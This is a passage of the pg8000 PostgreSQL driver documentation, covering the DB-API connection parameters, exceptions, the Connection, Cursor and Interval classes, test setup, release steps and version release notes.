`None` which means that the operating system will choose the\n source address.\n\nunix_sock::\n The path to the UNIX socket to access the database through, for example,\n `'\/tmp\/.s.PGSQL.5432'`. One of either `host` or `unix_sock` must be provided.\n\nssl_context::\n This governs SSL encryption for TCP\/IP sockets. It can have three values:\n * `None`, meaning no SSL (the default)\n * `True`, means use SSL with an\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n created using\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.create_default_context[`ssl.create_default_context()`]\n * An instance of\n https:\/\/docs.python.org\/3\/library\/ssl.html#ssl.SSLContext[`ssl.SSLContext`]\n which will be used to create the SSL connection. +\n +\n If your PostgreSQL server is behind an SSL proxy, you can set the\n pg8000-specific attribute `ssl.SSLContext.request_ssl = False`, which\n tells pg8000 to use an SSL socket, but not to request SSL from the\n PostgreSQL server. Note that this means you can't use SCRAM\n authentication with channel binding.\n\ntimeout::\n This is the time in seconds before the connection to the server will time\n out. The default is `None` which means no timeout.\n\ntcp_keepalive::\n If `True` then use\n https:\/\/en.wikipedia.org\/wiki\/Keepalive#TCP_keepalive[TCP keepalive]. 
\n\napplication_name::\n Sets the https:\/\/www.postgresql.org\/docs\/current\/runtime-config-logging.html#GUC-APPLICATION-NAME[application_name]. If your server character encoding is not\n `ascii` or `utf8`, then you need to provide values as bytes, eg.\n `'my_application_name'.encode('EUC-JP')`. The default is `None` which means\n that the server will set the application name.\n\nreplication::\n Used to run in https:\/\/www.postgresql.org\/docs\/12\/protocol-replication.html[streaming replication mode].\n If your server character encoding is not `ascii` or `utf8`, then you need to\n provide values as bytes, eg. `'database'.encode('EUC-JP')`.\n\n\n==== pg8000.dbapi.Date(year, month, day)\n\nConstruct an object holding a date value.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.date`\n\n\n==== pg8000.dbapi.Time(hour, minute, second)\n\nConstruct an object holding a time value.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.time`\n\n\n==== pg8000.dbapi.Timestamp(year, month, day, hour, minute, second)\n\nConstruct an object holding a timestamp value.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.datetime`\n\n\n==== pg8000.dbapi.DateFromTicks(ticks)\n\nConstruct an object holding a date value from the given ticks value (number of\nseconds since the epoch).\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.date`\n\n\n==== pg8000.dbapi.TimeFromTicks(ticks)\n\nConstruct an object holding a time value from the given ticks value (number of\nseconds since the epoch).\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.time`\n\n\n==== pg8000.dbapi.TimestampFromTicks(ticks)\n\nConstruct an object holding a timestamp value from the given ticks value\n(number of seconds since the epoch).\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `datetime.datetime`\n\n\n==== pg8000.dbapi.Binary(value)\n\nConstruct an object holding binary data.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: `bytes`.\n\n\n=== Generic Exceptions\n\nPg8000 uses the standard DBAPI 2.0 exception tree as \"generic\" exceptions.\nGenerally, more specific exception types are raised; these specific exception\ntypes are derived from the generic exceptions.\n\n==== pg8000.dbapi.Warning\n\nGeneric exception raised for important database warnings like data truncations.\nThis exception is not currently used by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n==== pg8000.dbapi.Error\n\nGeneric exception that is the base exception of all other error exceptions.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.InterfaceError\n\nGeneric exception raised for errors that are related to the database interface\nrather than the database itself. For example, if the interface attempts to use\nan SSL connection but the server refuses, an InterfaceError will be raised.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].
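\n\nAs a rough sketch of how these generic exceptions might be caught in application code (not from the original docs; the failing query is deliberately contrived, and everything pg8000 raises derives from `pg8000.dbapi.Error`):\n\n[source,python]\n----\nimport pg8000.dbapi\n\ncon = pg8000.dbapi.connect(user=\"postgres\", password=\"cpsnow\")\ncur = con.cursor()\ntry:\n    # Deliberate mistake: this table does not exist\n    cur.execute(\"SELECT title FROM no_such_table\")\nexcept pg8000.dbapi.Error as e:\n    # The failed transaction must be rolled back before the connection\n    # can be used again\n    con.rollback()\n    print(\"database error:\", e)\nfinally:\n    con.close()\n----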
\n\n\n==== pg8000.dbapi.DatabaseError\n\nGeneric exception raised for errors that are related to the database. This\nexception is currently never raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.DataError\n\nGeneric exception raised for errors that are due to problems with the processed\ndata. This exception is not currently raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.OperationalError\n\nGeneric exception raised for errors that are related to the database's\noperation and not necessarily under the control of the programmer. This\nexception is currently never raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.IntegrityError\n\nGeneric exception raised when the relational integrity of the database is\naffected. This exception is not currently raised by pg8000.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.InternalError\n\nGeneric exception raised when the database encounters an internal error. This\nis currently only raised when unexpected state occurs in the pg8000 interface\nitself, and is typically the result of an interface bug.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.ProgrammingError\n\nGeneric exception raised for programming errors. For example, this exception\nis raised if more parameter fields are in a query string than there are\navailable parameters.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n==== pg8000.dbapi.NotSupportedError\n\nGeneric exception raised in case a method or database API was used which is not\nsupported by the database.\n\nThis exception is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n=== Classes\n\n\n==== pg8000.dbapi.Connection\n\nA connection object is returned by the `pg8000.dbapi.connect()` function. It\nrepresents a single physical connection to a PostgreSQL database.\n\n===== pg8000.dbapi.Connection.notifications\n\nA deque of server-side\nhttps:\/\/www.postgresql.org\/docs\/current\/sql-notify.html[notifications] received\nby this database connection (via the LISTEN \/ NOTIFY PostgreSQL commands). Each\nlist item is a three-element tuple containing the PostgreSQL backend PID that\nissued the notify, the channel and the payload.\n\nThis attribute is not part of the DBAPI standard; it is a pg8000 extension.\n\n\n===== pg8000.dbapi.Connection.notices\n\nA deque of server-side notices received by this database connection.\n\nThis attribute is not part of the DBAPI standard; it is a pg8000 extension.\n\n\n===== pg8000.dbapi.Connection.parameter_statuses\n\nA deque of server-side parameter statuses received by this database connection.\n\nThis attribute is not part of the DBAPI standard; it is a pg8000 extension.
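\n\nA short sketch of how these deques might be inspected (again not from the original docs; it mirrors the native LISTEN \/ NOTIFY example elsewhere in this document, and the notification only appears once the transaction is committed):\n\n[source,python]\n----\nimport pg8000.dbapi\n\ncon = pg8000.dbapi.connect(user=\"postgres\", password=\"cpsnow\")\ncur = con.cursor()\ncur.execute(\"LISTEN aliens_landed\")\ncur.execute(\"NOTIFY aliens_landed\")\ncon.commit()\n\n# Each notification is a (backend_pid, channel, payload) tuple\nbackend_pid, channel, payload = con.notifications[0]\nprint(channel)  # aliens_landed\ncon.close()\n----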
\n\n\n===== pg8000.dbapi.Connection.autocommit\n\nFollowing the DB-API specification, autocommit is off by default. It can be\nturned on by setting this boolean pg8000-specific autocommit property to True.\n\nNew in version 1.9.\n\n\n===== pg8000.dbapi.Connection.close()\n\nCloses the database connection.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.cursor()\n\nCreates a `pg8000.Cursor` object bound to this connection.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.rollback()\n\nRolls back the current database transaction.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_begin(xid)\n\nBegins a TPC transaction with the given transaction ID xid. This method should\nbe called outside of a transaction (i.e. nothing may have executed since the\nlast `commit()` or `rollback()`). Furthermore, it is an error to call\n`commit()` or `rollback()` within the TPC transaction. A `ProgrammingError` is\nraised if the application calls `commit()` or `rollback()` during an active\nTPC transaction.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_commit(xid=None)\n\nWhen called with no arguments, `tpc_commit()` commits a TPC transaction\npreviously prepared with `tpc_prepare()`. If `tpc_commit()` is called prior to\n`tpc_prepare()`, a single phase commit is performed. A transaction manager may\nchoose to do this if only a single resource is participating in the global\ntransaction.\n\nWhen called with a transaction ID `xid`, the database commits the given\ntransaction. If an invalid transaction ID is provided, a\nProgrammingError will be raised. This form should be called outside of\na transaction, and is intended for use in recovery.\n\nOn return, the TPC transaction is ended.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_prepare()\n\nPerforms the first phase of a transaction started with .tpc_begin(). A\nProgrammingError is raised if this method is called outside of a TPC\ntransaction.\n\nAfter calling `tpc_prepare()`, no statements can be executed until\n`tpc_commit()` or `tpc_rollback()` have been called.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_recover()\n\nReturns a list of pending transaction IDs suitable for use with\n`tpc_commit(xid)` or `tpc_rollback(xid)`.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_rollback(xid=None)\n\nWhen called with no arguments, `tpc_rollback()` rolls back a TPC transaction.\nIt may be called before or after `tpc_prepare()`.\n\nWhen called with a transaction ID xid, it rolls back the given transaction. If\nan invalid transaction ID is provided, a `ProgrammingError` is raised. This\nform should be called outside of a transaction, and is intended for use in\nrecovery.\n\nOn return, the TPC transaction is ended.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].
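\n\nPutting the TPC methods together, here's a minimal two-phase-commit sketch (not from the original docs; the global transaction ID is made up and the `book` table is assumed to exist already):\n\n[source,python]\n----\nimport pg8000.dbapi\n\ncon = pg8000.dbapi.connect(user=\"postgres\", password=\"cpsnow\")\ncur = con.cursor()\n\n# Only global_transaction_id is significant to PostgreSQL\nxid = con.xid(0, \"my-global-tx\", \"\")\n\ncon.tpc_begin(xid)\ncur.execute(\"INSERT INTO book (title) VALUES (%s)\", (\"Dune\",))\ncon.tpc_prepare()  # phase one: PREPARE TRANSACTION on the server\ncon.tpc_commit()   # phase two: commit the prepared transaction\ncon.close()\n----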
\n\n===== pg8000.dbapi.Connection.xid(format_id, global_transaction_id, branch_qualifier)\n\nCreates a transaction ID. Only `global_transaction_id` is used in PostgreSQL;\n`format_id` and `branch_qualifier` are ignored. `global_transaction_id` may be\nany string identifier supported by PostgreSQL. Returns a tuple\n`(format_id, global_transaction_id, branch_qualifier)`.\n\n\n==== pg8000.dbapi.Cursor\n\nA cursor object is returned by the `pg8000.dbapi.Connection.cursor()` method\nof a connection. It has the following attributes and methods:\n\n===== pg8000.dbapi.Cursor.arraysize\n\nThis read\/write attribute specifies the number of rows to fetch at a time with\n`pg8000.dbapi.Cursor.fetchmany()`. It defaults to 1.\n\n\n===== pg8000.dbapi.Cursor.connection\n\nThis read-only attribute contains a reference to the connection object\n(an instance of `pg8000.dbapi.Connection`) on which the cursor was created.\n\nThis attribute is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.rowcount\n\nThis read-only attribute contains the number of rows that the last\n`execute()` or `executemany()` method produced (for query statements like\n`SELECT`) or affected (for modification statements like `UPDATE`).\n\nThe value is -1 if:\n\n* No `execute()` or `executemany()` method has been performed yet on the\n cursor.\n* There was no rowcount associated with the last `execute()`.\n* At least one of the statements executed as part of an `executemany()` had no\n row count associated with it.\n* Using a `SELECT` query statement on a PostgreSQL server older than version\n 9.\n* Using a `COPY` query statement on PostgreSQL server version 8.1 or older.\n\nThis attribute is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.description\n\nThis read-only attribute is a sequence of 7-item sequences. Each value contains\ninformation describing one result column. The 7 items returned for each column\nare (name, type_code, display_size, internal_size, precision, scale, null_ok).\nOnly the first two values are provided by the current implementation.\n\nThis attribute is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.close()\n\nCloses the cursor.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.execute(operation, args=None, stream=None)\n\nExecutes a database operation. Parameters may be provided as a sequence, or as\na mapping, depending upon the value of `pg8000.dbapi.paramstyle`. Returns the\ncursor, which may be iterated over.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\noperation::\n The SQL statement to execute.\n\nargs::\n If `pg8000.dbapi.paramstyle` is `qmark`, `numeric`, or `format`, this\nargument should be an array of parameters to bind into the statement. If\n`pg8000.dbapi.paramstyle` is `named`, the argument should be a `dict` mapping of\nparameters.
If `pg8000.dbapi.paramstyle` is `pyformat`, the argument value may be\neither an array or a mapping.\n\nstream::\n This is a pg8000 extension for use with the PostgreSQL\nhttp:\/\/www.postgresql.org\/docs\/current\/static\/sql-copy.html[COPY] command. For\na `COPY FROM` the parameter must be a readable file-like object, and for\n`COPY TO` it must be writable.\n\nNew in version 1.9.11.\n\n\n===== pg8000.dbapi.Cursor.executemany(operation, param_sets)\n\nPrepare a database operation, and then execute it against all parameter\nsequences or mappings provided.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\noperation::\n The SQL statement to execute.\nparam_sets::\n A sequence of parameters to execute the statement with. The values in the\n sequence should be sequences or mappings of parameters, the same as the args\n argument of the `pg8000.dbapi.Cursor.execute()` method.\n\n\n===== pg8000.dbapi.Cursor.callproc(procname, parameters=None)\n\nCall a stored database procedure with the given name and optional parameters.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\nprocname::\n The name of the procedure to call.\n\nparameters::\n A list of parameters.\n\n\n===== pg8000.dbapi.Cursor.fetchall()\n\nFetches all remaining rows of a query result.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: A sequence, each entry of which is a sequence of field values making\nup a row.\n\n\n===== pg8000.dbapi.Cursor.fetchmany(size=None)\n\nFetches the next set of rows of a query result.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nsize::\n The number of rows to fetch when called. If not provided, the\n `pg8000.dbapi.Cursor.arraysize` attribute value is used instead.\n\nReturns: A sequence, each entry of which is a sequence of field values making\nup a row. If no more rows are available, an empty sequence will be returned.\n\n\n===== pg8000.dbapi.Cursor.fetchone()\n\nFetch the next row of a query result set.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: A row as a sequence of field values, or `None` if no more rows are\navailable.\n\n\n===== pg8000.dbapi.Cursor.setinputsizes(*sizes)\n\nUsed to set the parameter types of the next query. This is useful if it's\ndifficult for pg8000 to work out the types from the parameters themselves\n(eg. for parameters of type None).\n\nsizes::\n Positional parameters that are either the Python type of the parameter to be\n sent, or the PostgreSQL oid. Common oids are available as constants such as\n `pg8000.dbapi.STRING`, `pg8000.dbapi.INTEGER`, `pg8000.dbapi.TIME` etc.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.setoutputsize(size, column=None)\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification], however, it\nis not implemented by pg8000.
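\n\nTo tie the cursor methods together, here's a small sketch of typical usage (not from the original docs; it assumes the connection details used in the earlier examples and the default `format` paramstyle):\n\n[source,python]\n----\nimport pg8000.dbapi\n\ncon = pg8000.dbapi.connect(user=\"postgres\", password=\"cpsnow\")\ncur = con.cursor()\ncur.execute(\"CREATE TEMPORARY TABLE planet (id SERIAL, name TEXT)\")\n\n# executemany() runs the statement once per parameter sequence\ncur.executemany(\n    \"INSERT INTO planet (name) VALUES (%s)\", ((\"Mercury\",), (\"Venus\",))\n)\n\ncur.execute(\"SELECT * FROM planet\")\nprint([d[0] for d in cur.description])  # the column names\nprint(cur.fetchall())\ncon.commit()\ncon.close()\n----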
\n\n\n==== pg8000.dbapi.Interval\n\nAn Interval represents a measurement of time. In PostgreSQL, an interval is\ndefined in the measure of months, days, and microseconds; as such, the pg8000\ninterval type represents the same information.\n\nNote that values of the `pg8000.Interval.microseconds`, `pg8000.Interval.days`,\nand `pg8000.Interval.months` properties are independently measured and cannot\nbe converted to each other. A month may be 28, 29, 30, or 31 days, and a day\nmay occasionally be lengthened slightly by a leap second.\n\n\n===== pg8000.dbapi.Interval.microseconds\n\nMeasure of microseconds in the interval.\n\nThe microseconds value is constrained to fit into a signed 64-bit integer. Any\nattempt to set a value too large or too small will result in an OverflowError\nbeing raised.\n\n\n===== pg8000.dbapi.Interval.days\n\nMeasure of days in the interval.\n\nThe days value is constrained to fit into a signed 32-bit integer. Any attempt\nto set a value too large or too small will result in an OverflowError being\nraised.\n\n\n===== pg8000.dbapi.Interval.months\n\nMeasure of months in the interval.\n\nThe months value is constrained to fit into a signed 32-bit integer. Any\nattempt to set a value too large or too small will result in an OverflowError\nbeing raised.\n\n\n== Tests\n\nInstall http:\/\/testrun.org\/tox\/latest\/[tox]:\n\n pip install tox\n\nEnable the PostgreSQL hstore extension by running the SQL command:\n\n create extension hstore;\n\nand add lines to pg_hba.conf for the various authentication options:\n\n....\nhost pg8000_md5 all 127.0.0.1\/32 md5\nhost pg8000_gss all 127.0.0.1\/32 gss\nhost pg8000_password all 127.0.0.1\/32 password\nhost pg8000_scram_sha_256 all 127.0.0.1\/32 scram-sha-256\nhost all all 127.0.0.1\/32 trust\n....\n\nthen run `tox` from the `pg8000` directory:\n\n`tox`\n\nThis will run the tests against the Python version of the virtual environment\nand the installed PostgreSQL version listening on port 5432 (or the port given\nby the `PGPORT` environment variable, if set).\n\nBenchmarks are run as part of the test suite at `tests\/test_benchmarks.py`.\n\n\n== Doing A Release Of pg8000\n\nRun `tox` to make sure all tests pass, then update the release notes, then do:\n\n....\ngit tag -a x.y.z -m \"version x.y.z\"\nrm -r build\nrm -r dist\npython setup.py sdist bdist_wheel --python-tag py3\nfor f in dist\/*; do gpg --detach-sign -a $f; done\ntwine upload dist\/*\n....\n\n\n== Release Notes\n\n=== Version 1.19.1, 2021-04-03\n\n* Fix bug where setinputsizes() was only used for the first parameter set of\n executemany().\n\n* Support more PostgreSQL array types.\n\n\n=== Version 1.19.0, 2021-03-28\n\n* Network error exceptions are now wrapped in an `InterfaceError`, with the\n original exception as the cause. The error message for network errors always\n starts with the string `network error`.\n\n* Upgraded to version 1.3.0 of Scramp, which has better error handling.\n\n\n=== Version 1.18.0, 2021-03-06\n\n* The `pg8000.dbapi.Cursor.callproc()` method is now implemented.\n\n* SCRAM channel binding is now supported. That means SCRAM mechanisms ending in\n '-PLUS' such as SCRAM-SHA-256-PLUS are now supported when connecting to the\n server.\n\n* A custom attribute `ssl.SSLContext.request_ssl` can be set to `False` to\n tell pg8000 to connect using an SSL socket, but to not request SSL from\n the PostgreSQL server. This is useful if you're connecting to a PostgreSQL\n server that's behind an SSL proxy.\n\n\n=== Version 1.17.0, 2021-01-30\n\n* The API is now split in two, pg8000.native and pg8000.dbapi. 
The legacy API\n still exists in this release, but will be removed in another release. The\n idea is that pg8000.dbapi can stick strictly to the DB-API 2 specification,\n while pg8000.native can focus on usability without having to worry about\n compatibility with the DB-API standard.\n\n* The column name in `Connection.description` used to be returned as a\n `bytes` but now it's returned as a `str`.\n\n* Removed extra wrapper types PGJson, PGEnum etc. These were never properly\n documented and the problem they solve can be solved using CAST in the SQL or\n by using setinputsizes.\n\n\n=== Version 1.16.6, 2020-10-10\n\n* The column name in `Connection.description` used to be returned as a\n `bytes` but now it's returned as a `str`.\n\n* Removed extra wrapper types PGJson, PGEnum etc. These were never properly\n documented and the problem they solve can be solved using CAST in the SQL or\n by using setinputsizes.\n\n\n=== Version 1.16.5, 2020-08-07\n\n* The TPC method `Connection.tpc_prepare()` was broken.\n\n\n=== Version 1.16.4, 2020-08-03\n\n* Include the `payload` in the tuples in `Connection.notifications`.\n* More constants (eg. `DECIMAL` and `TEXT_ARRAY`) are now available for\n PostgreSQL types that are used in `setinputsizes()`.\n\n\n=== Version 1.16.3, 2020-07-26\n\n* If an unrecognized parameter is sent to `Cursor.setinputsizes()` use the\n `pg8000.UNKNOWN` type (705).\n* When communicating with a PostgreSQL server with version < 8.2.0, `FETCH`\n commands don't have a row count.\n* Include in the source distribution all necessary test files from the `test`\n directory.\n\n\n=== Version 1.16.2, 2020-07-25\n\n* Use the\n https:\/\/www.postgresql.org\/docs\/current\/protocol-flow.html#id-1.10.5.7.4[simple query]\n cycle for queries that don't have parameters. This should give a performance\n improvement and also means that multiple statements can be executed in one go\n (as long as they don't have parameters) whereas previously the `sqlparse`\n library had to be used.\n\n\n=== Version 1.16.1, 2020-07-18\n\n* Enable the `Cursor.setinputsizes()` method. Previously this method didn't\n do anything. It's an optional method of the DBAPI 2.0 specification.\n\n\n=== Version 1.16.0, 2020-07-11\n\n* This is a backwardly incompatible release of pg8000.\n\n* All data types are now sent as text rather than binary.\n\n* Using adapters, custom types can be plugged in to pg8000.\n\n* Previously, named prepared statements were used for all statements.\n Now unnamed prepared statements are used by default, and named prepared\n statements can be used explicitly by calling the Connection.prepare()\n method, which returns a PreparedStatement object.\n\n\n=== Version 1.15.3, 2020-06-14\n\n* For TCP connections (as opposed to Unix socket connections) the\n https:\/\/docs.python.org\/3\/library\/socket.html#socket.create_connection[`socket.create_connection`]\n function is now used. This means pg8000 now works with IPv6 as well as IPv4.\n\n* Better error messages for failed connections. A 'cause' exception is now\n added to the top-level pg8000 exception, and the error message contains the\n details of what was being connected to (host, port etc.).\n\n\n=== Version 1.15.2, 2020-04-16\n\n* Added a new method `run()` to the connection, which lets you run queries\n directly without using a `Cursor`. It always uses the `named` parameter\n style, and the parameters are provided using keyword arguments. 
There are now\n two sets of interactive examples, one using the pg8000 extensions, and one\n using just DB-API features.\n\n* Better error message if certain parameters in the `connect()` function are of\n the wrong type.\n\n* The constructor of the `Connection` class now has the same signature as the\n `connect()` function, which makes it easier to use the `Connection` class\n directly if you want to.\n\n\n=== Version 1.15.1, 2020-04-04\n\n* Up to now the only supported way to create a new connection was to use the\n `connect()` function. However, some people are using the `Connection` class\n directly and this change makes it a bit easier to do that by making the class\n use a constructor which has the same signature as the `connect()` function.\n\n\n=== Version 1.15.0, 2020-04-04\n\n* Abandon the idea of arbitrary `init_params` in the connect() function. We now\n go back to having a fixed number of arguments. The argument `replication` has\n been added as this is the only extra init param that was needed. The reason\n for going back to a fixed number of arguments is that you get better feedback\n if you accidentally mis-type a parameter name.\n\n* The `max_prepared_statements` parameter has been moved from being a module\n property to being an argument of the connect() function.\n\n\n=== Version 1.14.1, 2020-03-23\n\n* Ignore any `init_params` that have a value of `None`. This seems to be more\n useful and the behaviour is more expected.\n\n\n=== Version 1.14.0, 2020-03-21\n\n* Tests are now included in the source distribution.\n\n* Any extra keyword parameters of the `connect()` function are sent as\n initialization parameters when the PostgreSQL session starts. See the API\n docs for more information. Thanks to Patrick Hayes for suggesting this.\n\n* The ssl.wrap_socket function is deprecated, so we now give the user the\n option of using a default `SSLContext` or to pass in a custom one. This is a\n backwardly incompatible change. See the API docs for more info. Thanks to\n Jonathan Ross Rogers <jrogers@emphasys-software.com> for his work on this.\n\n* Oversized integers are now returned as a `Decimal` type, whereas before a\n `None` was returned. Thanks to Igor Kaplounenko <igor.kaplounenko@intel.com>\n for his work on this.\n\n* Allow setting of connection source address in the `connect()` function. See\n the API docs for more details. Thanks to David King\n <davidking@davids-mbp.home> for his work on this.\n\n\n=== Version 1.13.2, 2019-06-30\n\n* Use the https:\/\/pypi.org\/project\/scramp\/[Scramp] library for the SCRAM\n implementation.\n\n* Fixed bug where SQL such as `make_interval(days := 10)` failed on the `:=`\n part. Thanks to https:\/\/github.com\/sanepal[sanepal] for reporting this.\n\n\n=== Version 1.13.1, 2019-02-06\n\n* We weren't correctly uploading releases to PyPI, which led to confusion\n when dropping Python 2 compatibility. Thanks to\n https:\/\/github.com\/piroux[Pierre Roux] for his\n https:\/\/github.com\/tlocke\/pg8000\/issues\/7[detailed explanation] of what\n went wrong and how to correct it.\n\n* Fixed bug where references to the `six` library were still in the code, even\n though we don't use `six` anymore.\n\n\n=== Version 1.13.0, 2019-02-01\n\n* Remove support for Python 2.\n\n* Support the scram-sha-256 authentication protocol. 
Reading through the\n https:\/\/github.com\/cagdass\/scrampy code was a great help in implementing\n this, so thanks to https:\/\/github.com\/cagdass[cagdass] for his code.\n\n\n=== Version 1.12.4, 2019-01-05\n\n* Support the PostgreSQL cast operator `::` in SQL statements.\n\n* Added support for more advanced SSL options. See docs on `connect` function\n for more details.\n\n* TCP keepalives enabled by default, can be set in the `connect` function.\n\n* Fixed bug in array dimension calculation.\n\n* Can now use the `with` keyword with connection objects.\n\n\n=== Version 1.12.3, 2018-08-22\n\n* Make PGVarchar and PGText inherit from `str`. Simpler than inheriting from\n a PGType.\n\n\n=== Version 1.12.2, 2018-06-28\n\n* Add PGVarchar and PGText wrapper types. This allows fine control over the\n string type that is sent to PostgreSQL by pg8000.\n\n\n=== Version 1.12.1, 2018-06-12\n\n\n* Revert back to the Python 3 `str` type being sent as an `unknown` type,\n rather than the `text` type as it was in the previous release. The reason is\n that with the `unknown` type there's the convenience of using a plain Python\n string for JSON, Enum etc. There's always the option of using the\n `pg8000.PGJson` and `pg8000.PGEnum` wrappers if precise control over the\n PostgreSQL type is needed.\n\n\n=== Version 1.12.0, 2018-06-12\n\nNote that this version is not backward compatible with previous versions.\n\n* The Python 3 `str` type was sent as an `unknown` type, but now it's sent as\n the nearest PostgreSQL type `text`.\n\n* pg8000 now recognizes that inline SQL comments end with a newline.\n\n* Single `%` characters now allowed in SQL comments.\n\n* The wrappers `pg8000.PGJson`, `pg8000.PGJsonb` and `pg8000.PGTsvector` can\n now be used to contain Python values to be used as parameters. The wrapper\n `pg8000.PGEnum` can be used for Python 2, which doesn't have a standard\n `enum.Enum` type.\n\n\n=== Version 1.11.0, 2017-08-16\n\nNote that this version is not backward compatible with previous versions.\n\n* The Python `int` type was sent as an `unknown` type, but now it's sent as the\n nearest matching PostgreSQL type. Thanks to Patrick Hayes.\n\n* Prepared statements are now closed on the server when pg8000 clears them from\n its cache.\n\n* Previously a `%` within an SQL literal had to be escaped, but this is no\n longer the case.\n\n* Notifications, notices and parameter statuses are now handled by simple\n `deque` buffers. See docs for more details.\n\n* Connections and cursors are no longer threadsafe. So to be clear, neither\n connections nor cursors should be shared between threads. One thread per\n connection is mandatory now. This has been done for performance reasons, and\n to simplify the code.\n\n* Rather than reading results from the server in batches, pg8000 now always\n downloads them in one go. This avoids `portal closed` errors and makes things\n a bit quicker, but now one has to avoid downloading too many rows in a single\n query.\n\n* Attempts to return something informative if the returned PostgreSQL timestamp\n value is outside the range of the Python datetime.\n\n* Allow empty arrays as parameters, assume they're of string type.\n\n* The cursor now has a context manager, so it can be used with the `with`\n keyword. Thanks to Ildar Musin.\n\n* Add support for `application_name` parameter when connecting to database,\n issue https:\/\/github.com\/mfenniak\/pg8000\/pull\/106[#106]. 
